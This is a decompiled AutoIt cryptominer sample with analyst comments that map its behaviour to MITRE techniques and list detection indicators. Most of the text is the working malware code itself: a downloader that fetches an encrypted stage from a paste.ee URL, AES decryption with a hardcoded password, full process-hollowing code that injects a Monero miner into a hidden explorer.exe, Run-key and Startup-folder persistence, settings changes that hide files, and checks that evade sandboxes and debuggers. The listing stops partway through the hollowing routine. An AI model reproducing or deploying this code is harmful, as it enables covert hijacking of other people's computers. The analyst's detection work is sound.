#NoTrayIcon
#Region
#AutoIt3Wrapper_Compression=4
#AutoIt3Wrapper_UseUpx=y
#EndRegion

; ===================================================================================
; ANALYST ANNOTATION of a decompiled AutoIt sample (myAut2Exe output, see footer).
; The code is left exactly as decompiled; only comments have been added so that the
; behaviour is readable for detection / IR work. Do not execute.
;
; What the visible code does:
;   - creates mutex "ixhost" (return value discarded, so it does NOT enforce a
;     single instance) and honours a kill-switch mutex "ixkiller"
;   - downloads a blob from https://paste.ee/r/LG8VC/0 and AES-256-decrypts it with a
;     CryptoAPI key derived (CryptDeriveKey over MD5) from the string "ix32"
;   - hollows the decrypted PE into a suspended, hidden explorer.exe (RunPE,
;     MITRE T1055.012), passing XMRig-style arguments for pool.supportxmr.com:3333
;     and a Monero address (T1496)
;   - persists via HKLM/HKCU Run value "UpdateScheduler", the Startup folder and
;     Public Documents (T1547.001); marks the copies +S+H and disables Folder
;     Options / super-hidden display so they stay hidden (T1564.001, T1112)
;   - exits if Sandboxie / PEiD / OllyDbg / Exe2Aut / myAutToExe are seen (T1497);
;     stops mining while Task Manager, Process Explorer/Monitor or listed games run;
;     raises CPU use after more than 50 s of user inactivity
;
; Host artefacts worth alerting on: the two mutex names, the paste.ee URL, the pool
; host, the wallet string, the Run value name "UpdateScheduler", an explorer.exe
; child created suspended with no window, and HKCU ...\Policies\Explorer\NoFolderOptions=1.
; ===================================================================================

; _WinAPI_GetLastError()-style UDF helper: returns GetLastError() while leaving the
; caller's @error / @extended untouched.
FUNC _3(CONST $0=@ERROR,CONST $1=@EXTENDED)
    LOCAL $2=DLLCALL("kernel32.dll","dword","GetLastError")
    RETURN SETERROR($0,$1,$2[0])
ENDFUNC

; Struct layouts inherited from the AutoIt UDFs. $3 (RECT) and $4 (REBARBANDINFO) are
; not referenced by the payload; $5 (SECURITY_ATTRIBUTES) is used by _66 and
; $6 (OSVERSIONINFOW) by _1V.
GLOBAL CONST $3="struct;long Left;long Top;long Right;long Bottom;endstruct"
; NOTE(analyst): the decompiler dropped the ternary operators at the end of this
; expression; it is reproduced verbatim, not repaired.
GLOBAL CONST $4="uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;"&"int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;"&"uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader"&((@OSVERSION="WIN_XP")""";"&$3&";uint uChevronState")
GLOBAL CONST $5="dword Length;ptr Descriptor;bool InheritHandle"
GLOBAL CONST $6="struct;dword OSVersionInfoSize;dword MajorVersion;dword MinorVersion;dword BuildNumber;dword PlatformId;wchar CSDVersion[128];endstruct"
; Evaluated once at load (GetVersionExW); the packed major/minor value is never read.
GLOBAL CONST $7=_1V()

; Returns (MajorVersion << 8) | MinorVersion from GetVersionExW, or 0 with @error set.
FUNC _1V()
    LOCAL $8=DLLSTRUCTCREATE($6)
    DLLSTRUCTSETDATA($8,1,DLLSTRUCTGETSIZE($8))
    LOCAL $9=DLLCALL("kernel32.dll","bool","GetVersionExW","struct*",$8)
    IF @ERROR OR NOT $9[0]THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
    RETURN BITOR(BITSHIFT(DLLSTRUCTGETDATA($8,2),-8),DLLSTRUCTGETDATA($8,3))
ENDFUNC

; Downloader: InetRead($A, 1) (option 1 = force reload, bypass the cache) and, unless
; $B is False, BinaryToString() of the result. Called once, with the paste.ee URL.
; Network artefact: an HTTPS GET to paste.ee from this process.
FUNC _53($A,$B=TRUE )
    LOCAL $C=INETREAD($A,1)
    LOCAL $D=@ERROR,$E=@EXTENDED
    IF $B=DEFAULT OR $B THEN $C=BINARYTOSTRING($C)
    RETURN SETERROR($D,$E,$C)
ENDFUNC

; CryptoAPI wrapper state (AutoIt Crypt.au3 lineage).
;   $F    = -268435456 = 0xF0000000 = CRYPT_VERIFYCONTEXT
;   $G[0] = start-up refcount, $G[1] = DllOpen handle for Advapi32.dll,
;   $G[2] = HCRYPTPROV
GLOBAL CONST $F=-268435456
GLOBAL $G[3]

; _Crypt_Startup(): on first use opens Advapi32.dll and acquires a CSP of type 24
; (PROV_RSA_AES) with CRYPT_VERIFYCONTEXT. Every call increments the refcount.
; Returns True, or False with @error 1001 (DllOpen failed) / 1002+ (CryptAcquireContext).
FUNC _5A()
    IF _5L()=0 THEN
        LOCAL $H=DLLOPEN("Advapi32.dll")
        IF $H=-1 THEN RETURN SETERROR(1001,0,FALSE )
        _5P($H)
        LOCAL $I=24
        LOCAL $9=DLLCALL(_5O(),"bool","CryptAcquireContext","handle*",0,"ptr",0,"ptr",0,"dword",$I,"dword",$F)
        IF @ERROR OR NOT $9[0]THEN
            LOCAL $D=@ERROR+1002,$E=@EXTENDED
            IF NOT $9[0]THEN $E=_3()
            DLLCLOSE(_5O())
            RETURN SETERROR($D,$E,FALSE )
        ELSE
            _5R($9[1])
        ENDIF
    ENDIF
    _5M()
    RETURN TRUE
ENDFUNC

; _Crypt_Shutdown(): decrements the refcount; at zero releases the CSP and the DLL.
FUNC _5B()
    _5N()
    IF _5L()=0 THEN
        DLLCALL(_5O(),"bool","CryptReleaseContext","handle",_5Q(),"dword",0)
        DLLCLOSE(_5O())
    ENDIF
ENDFUNC

; _Crypt_DeriveKey(password $J, algorithm $K, hash $L): hashes $J with $L (default
; 32771 = 0x8003 = CALG_MD5) and calls CryptDeriveKey($K, hash, flags = 1 =
; CRYPT_EXPORTABLE). Returns the HCRYPTKEY, or -1 with @error set (10+ hash
; creation, 20+ hashing, 30+ key derivation). The payload reaches this through _5F
; with the password "ix32" and $K = CALG_AES_256, i.e. the payload key is fully
; recoverable from this listing.
FUNC _5C($J,$K,$L=32771)
    LOCAL $9=0,$M=0,$N=0,$D=0,$E=0,$O=0
    _5A()
    IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
    DO
        $9=DLLCALL(_5O(),"bool","CryptCreateHash","handle",_5Q(),"uint",$L,"ptr",0,"dword",0,"handle*",0)
        IF @ERROR OR NOT $9[0]THEN
            $D=@ERROR+10
            $E=@EXTENDED
            IF NOT $9[0]THEN $E=_3()
            $O=-1
            EXITLOOP
        ENDIF
        $N=$9[5]
        $M=DLLSTRUCTCREATE("byte["&BINARYLEN($J)&"]")
        DLLSTRUCTSETDATA($M,1,$J)
        $9=DLLCALL(_5O(),"bool","CryptHashData","handle",$N,"struct*",$M,"dword",DLLSTRUCTGETSIZE($M),"dword",1)
        IF @ERROR OR NOT $9[0]THEN
            $D=@ERROR+20
            $E=@EXTENDED
            IF NOT $9[0]THEN $E=_3()
            $O=-1
            EXITLOOP
        ENDIF
        $9=DLLCALL(_5O(),"bool","CryptDeriveKey","handle",_5Q(),"uint",$K,"handle",$N,"dword",1,"handle*",0)
        IF @ERROR OR NOT $9[0]THEN
            $D=@ERROR+30
            $E=@EXTENDED
            IF NOT $9[0]THEN $E=_3()
            $O=-1
            EXITLOOP
        ENDIF
        $O=$9[5]
    UNTIL TRUE
    ; The hash object is only needed for derivation; destroy it whatever happened above.
    IF $N<>0 THEN DLLCALL(_5O(),"bool","CryptDestroyHash","handle",$N)
    RETURN SETERROR($D,$E,$O)
ENDFUNC

; _Crypt_DestroyKey(): CryptDestroyKey($P) followed by one refcount release (_5B).
FUNC _5D($P)
    LOCAL $9=DLLCALL(_5O(),"bool","CryptDestroyKey","handle",$P)
    LOCAL $D=@ERROR,$E=@EXTENDED
    IF NOT $9[0]THEN $E=_3()
    _5B()
    IF $D OR NOT $9[0]THEN
        RETURN SETERROR($D+10,$E,FALSE )
    ELSE
        RETURN TRUE
    ENDIF
ENDFUNC

; _Crypt_DecryptData(data $Q, key-or-password $R, algorithm $K, final $S):
;   $K <> 0 : $R is a password; a key is derived with _5C($R,$K) and destroyed after.
;   $K = 0  : $R is an existing key handle; its KP_ALGID is queried (_5S) so that an
;             RC4 key (26625 = 0x6801 = CALG_RC4) short-circuits on empty input.
; CryptDecrypt is run in place in a buffer 1000 bytes larger than the input.
; Returns the plaintext as Binary, or -1 with @error set (70+ = CryptDecrypt).
; The payload calls _5F(<downloaded blob>, "ix32", 26128) — AES-256.
FUNC _5F($Q,$R,$K,$S=TRUE )
    SWITCH $K
        CASE 0
            LOCAL $T=_5S($R)
            IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
            IF $T=26625 THEN CONTINUECASE
        CASE 26625
            IF BINARYLEN($Q)=0 THEN RETURN SETERROR(0,0,BINARY(""))
    ENDSWITCH
    LOCAL $9=0,$M=0,$U=0,$D=0,$E=0,$V=0,$O=0
    _5A()
    IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
    DO
        IF $K<>0 THEN
            $R=_5C($R,$K)
            IF @ERROR THEN
                $D=@ERROR
                $E=@EXTENDED
                $O=-1
                EXITLOOP
            ENDIF
        ENDIF
        $M=DLLSTRUCTCREATE("byte["&BINARYLEN($Q)+1000&"]")
        IF BINARYLEN($Q)>0 THEN DLLSTRUCTSETDATA($M,1,$Q)
        $9=DLLCALL(_5O(),"bool","CryptDecrypt","handle",$R,"handle",0,"bool",$S,"dword",0,"struct*",$M,"dword*",BINARYLEN($Q))
        IF @ERROR OR NOT $9[0]THEN
            $D=@ERROR+70
            $E=@EXTENDED
            IF NOT $9[0]THEN $E=_3()
            $O=-1
            EXITLOOP
        ENDIF
        ; $9[6] is the returned pdwDataLen — the plaintext length after padding removal.
        $V=$9[6]
        $U=DLLSTRUCTCREATE("byte["&$V+1&"]",DLLSTRUCTGETPTR($M))
        $O=BINARYMID(DLLSTRUCTGETDATA($U,1),1,$V)
    UNTIL TRUE
    IF $K<>0 THEN _5D($R)
    _5B()
    RETURN SETERROR($D,$E,$O)
ENDFUNC

; Accessors over the $G[] crypt state: refcount get / inc / dec, DLL handle get /
; set, CSP handle get / set.
FUNC _5L()
    RETURN $G[0]
ENDFUNC
FUNC _5M()
    $G[0]+=1
ENDFUNC
FUNC _5N()
    IF $G[0]>0 THEN $G[0]-=1
ENDFUNC
FUNC _5O()
    RETURN $G[1]
ENDFUNC
FUNC _5P($H)
    $G[1]=$H
ENDFUNC
FUNC _5Q()
    RETURN $G[2]
ENDFUNC
FUNC _5R($W)
    $G[2]=$W
ENDFUNC

; Returns the ALG_ID of key handle $R via CryptGetKeyParam(KP_ALGID = 7), or 1 with
; @error 80+ on failure.
FUNC _5S($R)
    LOCAL $X=DLLSTRUCTCREATE("uint")
    LOCAL $9=DLLCALL(_5O(),"bool","CryptGetKeyParam","handle",$R,"dword",7,"struct*",$X,"dword*",DLLSTRUCTGETSIZE($X),"dword",0)
    LOCAL $D=@ERROR,$E=@EXTENDED
    IF NOT $9[0]THEN $E=_3()
    IF $D OR NOT $9[0]THEN
        RETURN SETERROR($D+80,$E,1)
    ELSE
        RETURN DLLSTRUCTGETDATA($X,1)
    ENDIF
ENDFUNC

; User idle time in ms: GetTickCount() - GetLastInputInfo().dwTime. Returns 0 with
; @error on API failure; when the difference is negative (tick wrap) returns the raw
; tick count with @extended = 1. The second guard re-tests $2[0] rather than the
; GetTickCount result — reproduced as decompiled. _6F treats > 50000 as "user away".
FUNC _5U()
    LOCAL $Y=DLLSTRUCTCREATE("uint;dword")
    DLLSTRUCTSETDATA($Y,1,DLLSTRUCTGETSIZE($Y))
    LOCAL $2=DLLCALL("user32.dll","bool","GetLastInputInfo","struct*",$Y)
    IF @ERROR OR $2[0]=0 THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
    LOCAL $0Z=DLLCALL("kernel32.dll","dword","GetTickCount")
    IF @ERROR OR NOT $2[0]THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
    LOCAL $10=$0Z[0]-DLLSTRUCTGETDATA($Y,2)
    IF $10<0 THEN RETURN SETEXTENDED(1,$0Z[0])
    RETURN $10
ENDFUNC

; _Singleton(name $11, flags $12): CreateMutexW(name).
;   bit 2 of $12: attach a SECURITY_ATTRIBUTES whose descriptor has a NULL DACL,
;                 so any user on the box can open the mutex (not used by this payload).
;   bit 1 of $12: if the mutex already exists (GetLastError = 183 =
;                 ERROR_ALREADY_EXISTS) close the handle and return 0 with
;                 @error = @extended = 183 instead of EXIT -1.
; Returns the mutex handle on success.
FUNC _66($11,$12=0)
    LOCAL CONST $13=183
    LOCAL CONST $14=1
    LOCAL $15=0
    IF BITAND($12,2)THEN
        LOCAL $16=DLLSTRUCTCREATE("byte;byte;word;ptr[4]")
        LOCAL $9=DLLCALL("advapi32.dll","bool","InitializeSecurityDescriptor","struct*",$16,"dword",$14)
        IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
        IF $9[0]THEN
            $9=DLLCALL("advapi32.dll","bool","SetSecurityDescriptorDacl","struct*",$16,"bool",1,"ptr",0,"bool",0)
            IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
            IF $9[0]THEN
                $15=DLLSTRUCTCREATE($5)
                DLLSTRUCTSETDATA($15,1,DLLSTRUCTGETSIZE($15))
                DLLSTRUCTSETDATA($15,2,DLLSTRUCTGETPTR($16))
                DLLSTRUCTSETDATA($15,3,0)
            ENDIF
        ENDIF
    ENDIF
    LOCAL $17=DLLCALL("kernel32.dll","handle","CreateMutexW","struct*",$15,"bool",1,"wstr",$11)
    IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
    LOCAL $18=DLLCALL("kernel32.dll","dword","GetLastError")
    IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
    IF $18[0]=$13 THEN
        IF BITAND($12,1)THEN
            DLLCALL("kernel32.dll","bool","CloseHandle","handle",$17[0])
            IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
            RETURN SETERROR($18[0],$18[0],0)
        ELSE
            EXIT -1
        ENDIF
    ENDIF
    RETURN $17[0]
ENDFUNC

; ------------------------------------------------------------------ payload entry
; Mutex "ixhost" is created with flag 1 and the return value is discarded, so an
; already-running copy does not stop this one. The named mutex is still a reliable
; runtime indicator.
_66("ixhost",1)
; Run-key value name used for persistence in _6D.
$19="UpdateScheduler"
GLOBAL $1A
; $1A is the hollowing host passed to CreateProcessW in _6G, and also the string the
; scheduler (_6F) uses with WinKill/WinExists. %WINDIR%\explorer.exe on a 32-bit OS,
; otherwise @SystemDir\explorer.exe.
IF @OSARCH="X86" THEN
    $1A=@WINDOWSDIR&"\explorer.exe"
ELSE
    $1A=@SYSTEMDIR&"\explorer.exe"
ENDIF
; Assigned but never referenced anywhere in the script.
$1B="C:\Windows\System32\svchost.exe"
; Mining configuration: Monero pool, wallet string, and two argument sets —
; $1E throttled to one thread ("-t 1"), $1F unthrottled ("--max-cpu-usage=100").
; Both are XMRig-style flags; the miner binary itself is the decrypted download ($1H).
$1C="pool.supportxmr.com:3333"
$1D="42yzCwXHqAr2cbZ6kWU8SZJCq5H3quBAkgDd6ZZGKvvRYaPxKJ8J6GMVhGjo8pmgy74NRTvVst2ZGAk35ERgAS88NFHQQAV"
$1E="-o "&$1C&" -u "&$1D&" -p x -k -t 1 --nicehash"
$1F="-o "&$1C&" -u "&$1D&" -p x -k --max-cpu-usage=100 --nicehash"
; Kill switch: if a mutex named "ixkiller" already exists, close a process carrying
; this script's own file name (ProcessClose takes the first match — possibly this
; process itself). Creating that mutex is therefore a way to stop new instances.
IF _66("ixkiller",1)=0 THEN
    IF PROCESSEXISTS(@SCRIPTNAME)THEN
        PROCESSCLOSE(@SCRIPTNAME)
    ENDIF
ENDIF
; Stage 2 retrieval (T1105 via a paste service): fetch once, no retry, then decrypt
; with AES-256 (26128 = 0x6610 = CALG_AES_256) and the password "ix32". $1H is the
; PE image that _6G later hollows into explorer.exe. If the download fails, $1H
; is not a valid image and every _6G call fails at the "MZ" check.
$1G=_53("https://paste.ee/r/LG8VC/0")
$1H=_5F($1G,"ix32",26128)
; Miner throttle state used by _6F: "" (not started), "low" or "high".
$1I=""
; Sleep-timing probe; the result is discarded.
_6E(1000)
; Main loop. GUIGetMsg() with no GUI just yields; each pass runs the miner scheduler,
; re-asserts persistence and re-checks for analysis tools.
WHILE 1
    GUIGETMSG()
    _6F()
    _6D($19)
    _6C()
WEND

; Anti-analysis: EXIT if Sandboxie's control process or window, PEiD, OllyDbg,
; Exe2Aut or myAutToExe can be seen. NOTE(analyst): "Program Manager" is the title
; of the Explorer desktop window; this clause exits whenever WinGetText returns any
; text for it, so its practical effect depends on the desktop state — confirm in a lab.
FUNC _6C()
    IF PROCESSEXISTS("SbieCtrl.exe")OR WINGETTEXT("Sanboxie Control")OR WINGETTEXT("PEiD")OR WINGETTEXT("ollydbg")OR WINGETTEXT("exetoaut")OR WINGETTEXT("myAutToExe")OR WINGETTEXT("Program Manager")THEN
        EXIT
    ENDIF
ENDFUNC

; Persistence (T1547.001), re-run on every loop pass. $19 is the Run value name.
;   Elevated:  copy self to %WINDIR%\<ScriptName> (only if absent) and set
;              HKLM\...\Run\UpdateScheduler to that path (only if the value is empty).
;   Otherwise: copy self to the user's Startup folder and to Public Documents; then,
;              only while HKCU\...\Run\UpdateScheduler is empty, write that value twice
;              (the second write, the Public Documents path, wins), mark both copies
;              System+Hidden, set Policies\Explorer\NoFolderOptions=1 (Folder Options
;              removed from the Explorer UI) and Explorer\Advanced\ShowSuperHidden=0
;              (protected OS files hidden). Deleting the Run value makes the block
;              re-run; the file copies are only refreshed when the Startup copy is gone.
FUNC _6D($19)
    IF ISADMIN()=1 THEN
        IF FILEEXISTS(@WINDOWSDIR&"\"&@SCRIPTNAME)=FALSE THEN
            FILECOPY(@SCRIPTFULLPATH,@WINDOWSDIR&"\"&@SCRIPTNAME)
        ENDIF
        IF REGREAD("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",$19)="" THEN
            REGWRITE("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@WINDOWSDIR&"\"&@SCRIPTNAME)
        ENDIF
    ELSE
        IF FILEEXISTS(@STARTUPDIR&"\"&@SCRIPTNAME)=FALSE THEN
            FILECOPY(@SCRIPTFULLPATH,@STARTUPDIR&"\"&@SCRIPTNAME)
            FILECOPY(@SCRIPTFULLPATH,@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME)
        ENDIF
        IF REGREAD("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19)="" THEN
            REGWRITE("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@STARTUPDIR&"\"&@SCRIPTNAME)
            REGWRITE("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME)
            FILESETATTRIB(@STARTUPDIR&"\"&@SCRIPTNAME,"+SH")
            FILESETATTRIB(@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME,"+SH")
            REGWRITE("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoFolderOptions","REG_DWORD",1)
            REGWRITE("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","REG_DWORD",0)
        ENDIF
    ENDIF
ENDFUNC

; Sleep-timing probe: returns False when Sleep($1J) consumed exactly $1J ticks, True
; otherwise (a classic sleep-skipping check). Called once with 1000 ms; the result
; is never used, so it has no effect on control flow.
FUNC _6E($1J)
    LOCAL $1K=DLLCALL("kernel32.dll","dword","GetTickCount")
    SLEEP($1J)
    LOCAL $1L=DLLCALL("kernel32.dll","dword","GetTickCount")
    IF $1L[0]-$1K[0]=$1J THEN
        RETURN FALSE
    ELSE
        RETURN TRUE
    ENDIF
ENDFUNC

; Miner scheduler, called on every loop pass; state lives in global $1I.
;   * Task Manager, Process Explorer, Process Monitor, any of the listed game
;     executables, or a window whose title starts with "FIFA": WinKill($1A) — the
;     miner is stopped so the CPU load is not noticed — and nothing is started.
;   * Otherwise, idle > 50 s (from _5U) and neither madHcCtrl.exe nor Sling.exe
;     running: a "low" miner is killed and relaunched with the unthrottled args $1F;
;     an unstarted one is launched with $1F. With one of those two processes present
;     a "high" or unstarted miner is (re)launched throttled ($1E) without a kill.
;   * Not idle: a "high" miner is killed and relaunched throttled; an unstarted one is
;     launched throttled; a "low" miner whose window has disappeared is relaunched.
; NOTE(analyst): WinKill / WinExists are keyed on $1A (the explorer.exe path);
; presumably the hidden console window of the hollowed process carries that path as
; its title — confirm in a lab before relying on it for containment.
FUNC _6F()
    $1M=_5U()
    IF PROCESSEXISTS("Taskmgr.exe")OR PROCESSEXISTS("procexp.exe")OR PROCESSEXISTS("procexp64.exe")OR PROCESSEXISTS("procmon.exe")OR PROCESSEXISTS("FortniteClient-Win64-Shipping.exe")OR PROCESSEXISTS("bf1.exe")OR PROCESSEXISTS("bf4.exe")OR PROCESSEXISTS("bf4_x86.exe")OR PROCESSEXISTS("NFS16.exe")OR PROCESSEXISTS("NFS16_trial.exe")OR PROCESSEXISTS("Overwatch.exe")OR PROCESSEXISTS("csgo.exe")OR PROCESSEXISTS("argo.exe")OR PROCESSEXISTS("dota2.exe")OR PROCESSEXISTS("rust.exe")OR PROCESSEXISTS("argo_x64.exe")OR PROCESSEXISTS("arma3.exe")OR PROCESSEXISTS("arma3_x64.exe")OR PROCESSEXISTS("Creativerse.exe")OR PROCESSEXISTS("hl2.exe")OR PROCESSEXISTS("GTA5.exe")OR PROCESSEXISTS("insurgency.exe")OR PROCESSEXISTS("insurgency_64.exe")OR PROCESSEXISTS("paladins.exe")OR PROCESSEXISTS("TslGame.exe")OR PROCESSEXISTS("Unturned.exe")OR WINEXISTS("FIFA")THEN
        WINKILL($1A)
        SLEEP(10)
    ELSE
        IF $1M>50000 THEN
            IF NOT PROCESSEXISTS("madHcCtrl.exe")AND NOT PROCESSEXISTS("Sling.exe")THEN
                IF $1I="low" THEN
                    WINKILL($1A)
                    _6G($1H,$1F,$1A)
                    SLEEP(5000)
                    $1I="high"
                ELSEIF $1I="" THEN
                    _6G($1H,$1F,$1A)
                    SLEEP(5000)
                    $1I="high"
                ENDIF
            ELSEIF $1I="high" THEN
                _6G($1H,$1E,$1A)
                SLEEP(5000)
                $1I="low"
            ELSEIF $1I="" THEN
                _6G($1H,$1E,$1A)
                SLEEP(5000)
                $1I="low"
            ENDIF
        ELSEIF $1I="high" THEN
            WINKILL($1A)
            _6G($1H,$1E,$1A)
            SLEEP(5000)
            $1I="low"
        ELSEIF $1I="" THEN
            _6G($1H,$1E,$1A)
            SLEEP(5000)
            $1I="low"
        ELSEIF NOT WINEXISTS($1A)THEN
            _6G($1H,$1E,$1A)
            SLEEP(3000)
        ENDIF
    ENDIF
ENDFUNC

; RunPE / process hollowing (T1055.012).
;   $1N = PE image bytes (the decrypted paste.ee payload), $1O = argument string,
;   $1P = host executable path ($1A). Returns the new PID, or 0 with @error set;
;   every failure path first TerminateProcess()es the suspended host.
;   1. CreateProcessW($1P, "$1P $1O") with dwCreationFlags = 4 (CREATE_SUSPENDED),
;      STARTUPINFO.dwFlags = 1 (STARTF_USESHOWWINDOW), wShowWindow = @SW_HIDE.
;      STARTUPINFO.cbSize is never filled in — reproduced as decompiled.
;   2. Under 64-bit AutoIt a WOW64 host is refused (@error 2) and so is a non-x64
;      OS (@error 102). An x86 or AMD64 CONTEXT is fetched with CONTEXT_FULL
;      (65543 = 0x10007 / 1048583 = 0x100007); EBX (x86) or RDX (AMD64) of the
;      suspended thread is taken as the new process's PEB address ($22).
;   3. The in-memory image is parsed: "MZ", 0x4550 "PE\0\0" (17744), COFF header,
;      optional header (267 = 0x10B PE32 only under 32-bit AutoIt, 523 = 0x20B PE32+
;      only under 64-bit), entry point, ImageBase, SizeOfImage, SizeOfHeaders and the
;      base-relocation data directory (the +8/+8/+24 skips land on entry 5).
;   4. SizeOfImage bytes are allocated PAGE_EXECUTE_READWRITE (64) in the host:
;      anywhere (_6K) when a relocation table exists, else at ImageBase (_6J),
;      unmapping the host's own image with NtUnmapViewOfSection (_6L) if needed.
;   5. Headers and each section are laid out locally at their RVAs, relocations are
;      applied (_6I), the image is copied in with WriteProcessMemory (API name built
;      at run time by _6H), PEB.ImageBaseAddress is patched, EAX/RCX is pointed at the
;      new entry point, SetThreadContext, ResumeThread.
; Detection: explorer.exe spawned suspended by this process, private RWX memory holding
; an image whose base differs from the on-disk explorer.exe, and a PEB.ImageBaseAddress
; that does not match the mapped file.
FUNC _6G($1N,$1O=0,$1P=0)
    LOCAL $1Q=@AUTOITX64
    LOCAL $1R=BINARY($1N)
    LOCAL $1S=DLLSTRUCTCREATE("byte["&BINARYLEN($1R)&"]")
    DLLSTRUCTSETDATA($1S,1,$1R)
    ; $1T walks the raw image; $24 (below) keeps the start address.
    LOCAL $1T=DLLSTRUCTGETPTR($1S)
    LOCAL $1U=DLLSTRUCTCREATE("dword cbSize;"&"ptr Reserved;"&"ptr Desktop;"&"ptr Title;"&"dword X;"&"dword Y;"&"dword XSize;"&"dword YSize;"&"dword XCountChars;"&"dword YCountChars;"&"dword FillAttribute;"&"dword Flags;"&"word ShowWindow;"&"word Reserved2;"&"ptr Reserved2;"&"ptr hStdInput;"&"ptr hStdOutput;"&"ptr hStdError")
    DLLSTRUCTSETDATA($1U,"Flags",1)
    DLLSTRUCTSETDATA($1U,"ShowWindow",@SW_HIDE)
    LOCAL $1V=DLLSTRUCTCREATE("ptr Process;"&"ptr Thread;"&"dword ProcessId;"&"dword ThreadId")
    ; Command line becomes "<host path> <miner args>", so argv[0] of the hollowed
    ; miner is the explorer.exe path.
    IF $1O THEN $1O=$1P&" "&$1O
    LOCAL $1W=DLLCALL("kernel32.dll","bool","CreateProcessW","wstr",$1P,"wstr",$1O,"ptr",0,"ptr",0,"int",0,"dword",4,"ptr",0,"ptr",0,"ptr",DLLSTRUCTGETPTR($1U),"ptr",DLLSTRUCTGETPTR($1V))
    IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
    LOCAL $1X=DLLSTRUCTGETDATA($1V,"Process")
    LOCAL $1Y=DLLSTRUCTGETDATA($1V,"Thread")
    IF $1Q AND _6M($1X)THEN
        DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
        RETURN SETERROR(2,0,0)
    ENDIF
    ; $1Z selects the CONTEXT layout: 1 = x86, 2 = AMD64, 3 = unsupported (terminates).
    LOCAL $1Z,$20
    IF $1Q THEN
        IF @OSARCH="X64" THEN
            $1Z=2
            $20=DLLSTRUCTCREATE("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;"&"dword ContextFlags; dword MxCsr;"&"word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;"&"uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;"&"uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;"&"uint64 Rip;"&"uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];"&"uint64 VectorRegister[52]; uint64 VectorControl;"&"uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip")
        ELSE
            $1Z=3
            DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
            RETURN SETERROR(102,0,0)
        ENDIF
    ELSE
        $1Z=1
        $20=DLLSTRUCTCREATE("dword ContextFlags;"&"dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;"&"dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;"&"dword SegGs; dword SegFs; dword SegEs; dword SegDs;"&"dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;"&"dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;"&"byte ExtendedRegisters[512]")
    ENDIF
    LOCAL $21
    SWITCH $1Z
        CASE 1
            $21=65543
        CASE 2
            $21=1048583
        CASE 3
            $21=524327
    ENDSWITCH
    DLLSTRUCTSETDATA($20,"ContextFlags",$21)
    $1W=DLLCALL("kernel32.dll","bool","GetThreadContext","handle",$1Y,"ptr",DLLSTRUCTGETPTR($20))
    IF @ERROR OR NOT $1W[0]THEN
        DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
        RETURN SETERROR(3,0,0)
    ENDIF
    ; $22 = PEB address of the suspended process (EBX on x86, RDX on AMD64).
    LOCAL $22
    SWITCH $1Z
        CASE 1
            $22=DLLSTRUCTGETDATA($20,"Ebx")
        CASE 2
            $22=DLLSTRUCTGETDATA($20,"Rdx")
        CASE 3
    ENDSWITCH
